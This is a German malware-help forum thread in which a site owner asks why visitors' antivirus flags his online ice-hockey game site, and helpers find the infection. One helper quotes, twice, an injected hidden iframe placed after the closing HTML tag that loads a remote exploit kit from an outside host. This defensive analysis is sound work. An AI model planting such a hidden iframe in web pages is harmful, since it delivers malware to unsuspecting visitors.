Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Homepage befallen? Kann doch nicht... (https://www.trojaner-board.de/131317-homepage-befallen.html)

MrVain712 20.02.2013 22:10

Homepage befallen? Kann doch nicht...
 
Hallo,

Ich stehe vor einem Rätsel.
Ich betreibe mit einigen Kollegen einen Online Eishockey Manager und wir haben seit einiger Zeit das Problem, das bei einigen Managern deren Virenprogramm (in den meisten Fällen antivir) beim Besuch unserer Homepage/Forum, Alarm schlägt.

Bei einem Mitglied hat sich sogar angeblich nach dem Besuch unserer Homepage etwas mit dem Namen "system progressive protection" installiert und er hat daraufhin wohl einen Großteil seiner Daten verloren...

Nur begreife ich das ganze nicht... Ich selber nutzte bis vergangenen Monat noch Kaspersky, welches NIE beim Besuch der Seite gemeckert hatte, auch wenn ich von der Arbeit aus die Seite aufgerufen habe, gab es nie Meldungen in der Art und dort nutzen wir Norton...
Auch bei einigen anderen Managern gab es nie solche Meldungen...
Darum kann ich das ganze nicht so recht glauben, das die Seite wirklich befallen ist..

Ich habe die Seite auch schon von Norton Safe Web scannen lassen, alles tadellos... Auch google sagt, die Seite ist frei von jeglicher Malware... Gleiche gilt für Websitedefender... auch dort wird mir gesagt, die Seite ist sauber...

Auch mein Hoster, sagt mir das diese keinerlei Meldungen erhalten haben... Wenn dem so wäre, wären die befallenen Dateien/Seiten auch schon längst gesperrt worden...


Ist es denn möglich, das der Befall sich nur auf bestimmte User auswirkt? Finde es halt nur komisch, das bei manchen das Virenprogramm meckert, einer sogar einen richtigen Befall hatte und die meisten überhaupt keine Probleme haben...


Und das die Virenprogramme hin und wieder meckern ist ja auch nicht ungewöhnlich... Google Chrome meckert bei mir hin und wieder auch, wenn ich mal eine Seite (z.B. Forenseite von meinem Fussballverein, meinem Lieblingsitaliener) aufrufe, diese sei Malware verseucht etc.



Könnt ihr mir weiterhelfen? Möchte nicht unnötig die Homepage platt machen...


mfg

Vain

markusg 20.02.2013 22:12

Hi ein paar der fundmeldungen hier währen interessant.
übrigens bei der Rogue gehen die Daten nicht verloren, der gute Mann soll sich mal hier melden.
die seite währe auch günstig.

MrVain712 20.02.2013 22:29

Also die Seite ist:
hxxp://www-tiger-area.com
und das Forum ist über:
hxxp://tiger-area.com/wbb3/
zu erreichen.

Also Fundmeldungen waren:
Web Attack Toolkit Website 8
Angreifender PC : Panelallegro.1110.pl

bei nem anderen ist die Seite gesperrt worden mit der Begründung "unsicheres Programm"

markusg 20.02.2013 22:30

die hier oder?
onlineeishockeymanager.de

MrVain712 20.02.2013 22:35

Zitat:

Zitat von markusg (Beitrag 1016222)
die hier oder?
onlineeishockeymanager.de

tiger-area.com

bzw. forum:

tiger-area.com/wbb3/

handball10 20.02.2013 23:10

Halli Hallo :)

die Frameset-Seite von tiger-area.com ist in jedem Fall verseucht!

Zum Schluss wird noch hinter dem schließenden HTML-Tag ein Inlineframe eingebunden:

Code:

<iframe src="hxxp://illadearousa.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
Der Inhalt des Frames bindet wiederum ein Inline-Frame ein, hinter welchem sich ein Exploit-Kit verbirgt...
Dessen Inhalt hab ich noch nicht so gerafft (very obfuscated :headbang: )- Fortsetzung folgt.

Am besten, du suchst in jedem Fall die gesamte Seite einmal durch.
Wer weiß, was da noch so rumschwirrt...

Einen schönen Abend noch :)

markusg 20.02.2013 23:20

hi
danke, währs möglich eine Kopie der Index.php zu bekommen?
bei
File-Upload.net - Ihr kostenloser File Hoster!
hochladen, link an mich als private nachicht.
ps von der
tiger-area.com

markusg 20.02.2013 23:23

@handball10
schön mal wieder von dir zu lesen :-)

MrVain712 20.02.2013 23:30

schonmal vielen dank euch beiden,

habe die index.php geschickt. jedoch vom forum. denn bei tiger-area.com ist die index ja eine .htm seite...
Hoffe das ist richtig so

Zitat:

Zitat von handball10 (Beitrag 1016252)
Halli Hallo :)

die Frameset-Seite von tiger-area.com ist in jedem Fall verseucht!

Zum Schluss wird noch hinter dem schließenden HTML-Tag ein Inlineframe eingebunden:

Code:

<iframe src="hxxp://illadearousa.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
Der Inhalt des Frames bindet wiederum ein Inline-Frame ein, hinter welchem sich ein Exploit-Kit verbirgt...
Dessen Inhalt hab ich noch nicht so gerafft (very obfuscated :headbang: )- Fortsetzung folgt.

Am besten, du suchst in jedem Fall die gesamte Seite einmal durch.
Wer weiß, was da noch so rumschwirrt...

Einen schönen Abend noch :)

Hmm wie kann ich die Seite denn überprüfen?
habe mir jetzt einfach mal die startseite runtergezogen, also die index.htm...
und jetzt meckert auch kaspersky bei mir und löscht die datei sofort...

markusg 20.02.2013 23:36

hi dann die index.html.

MrVain712 20.02.2013 23:40

problem ist, ich bekomme die nich heruntergeladen... kaspersky löscht die sofort ... oder kann ich da eine ausnahme setzen? also die datei erlauben?

markusg 20.02.2013 23:41

müsste sich kurzfristig deaktivieren lassen, versuch mal über rechtsklick auf das Symbol im Infobereich.

MrVain712 20.02.2013 23:46

hab dir die datei geschickt

markusg 20.02.2013 23:49

danke.
hast du backups deiner homepages? dann könnte man die einspielen, natürlich vorher schauen ob das frame eingebunden ist am ende der seite.

MrVain712 20.02.2013 23:52

das backup ist leider auch befallen...
Würd es denn reichen, wenn ich die frames aus allen seiten rauslösche? habs gerade mal testweise bei einer seite gemacht, jetzt bleibt kaspersky bei dieser ruhig


Alle Zeitangaben in WEZ +1. Es ist jetzt 13:30 Uhr.

Copyright ©2000-2024, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129